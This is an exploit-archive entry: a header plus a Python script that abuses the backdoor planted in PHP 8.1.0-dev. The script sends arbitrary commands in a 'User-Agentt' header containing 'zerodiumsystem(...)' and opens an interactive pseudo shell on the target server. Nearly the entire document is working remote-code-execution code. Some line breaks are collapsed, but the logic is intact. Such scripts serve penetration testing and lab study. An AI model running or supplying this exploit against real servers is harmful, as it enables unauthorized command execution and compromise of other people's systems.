# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution# Date: 23 may 2021# Exploit Author: flast101# Vendor Homepage: https://www.php.net/# Software Link: # - https://hub.docker.com/r/phpdaily/php#- https://github.com/phpdaily/php# Version: 8.1.0-dev# Tested on: Ubuntu 20.04# References:#- https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a# - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com
An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell ont the host.
"""#!/usr/bin/env python3import os
import re
import requests
host =input("Enter the full host url:\n")
request = requests.Session()
response = request.get(host)ifstr(response)=='<Response [200]>':print("\nInteractive shell is opened on", host,"\nCan't acces tty; job crontol turned off.")try:while1:
cmd =input("$ ")
headers ={"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0","User-Agentt":"zerodiumsystem('"+ cmd +"');"}
response = request.get(host, headers = headers, allow_redirects =False)
current_page = response.text
stdout = current_page.split('<!DOCTYPE html>',1)
text =print(stdout[0])except KeyboardInterrupt:print("Exiting...")
exit
else:print("\r")print(response)print("Host is not available, aborting...")
exit
